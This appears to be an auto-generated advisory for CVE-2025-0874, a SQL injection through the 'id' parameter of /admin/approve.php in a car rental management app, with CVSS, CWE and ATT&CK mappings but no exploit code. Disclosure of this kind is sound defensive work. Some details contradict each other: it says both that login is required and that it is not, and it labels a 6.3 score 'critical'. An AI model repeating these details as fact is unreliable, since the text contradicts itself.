CVE-2025-0874
Published: 30 January 2025
Description
Adversaries may leverage databases to mine valuable information.
Security Summary
CVE-2025-0874 is a SQL injection vulnerability classified as critical in code-projects Simple Plugins Car Rental Management version 1.0. The issue affects unknown functionality within the file /admin/approve.php, where manipulation of the 'id' argument enables the injection. It is associated with CWE-74 (improper neutralization of special elements) and CWE-89 (SQL injection), carrying a CVSS v3.1 base score of 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L). The vulnerability was published on 2025-01-30.
The attack can be launched remotely by an authenticated user with low privileges (PR:L), requiring no user interaction. Successful exploitation allows an attacker to manipulate the 'id' parameter in /admin/approve.php, potentially leading to unauthorized access, data modification, or disruption with low impacts on confidentiality, integrity, and availability.
Advisories referenced in VulDB entries (ctiid.294068, id.294068, submit.488538) and a GitHub issue document the vulnerability, noting that an exploit has been publicly disclosed and may be used. Additional context is available from the project site at code-projects.org. No specific patch or mitigation details are outlined in the provided information.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The SQL injection vulnerability in the public-facing web application (/admin/approve.php) enables remote exploitation without authentication (T1190) and facilitates unauthorized querying, leakage, modification, or deletion of data from the backend database (T1213.006).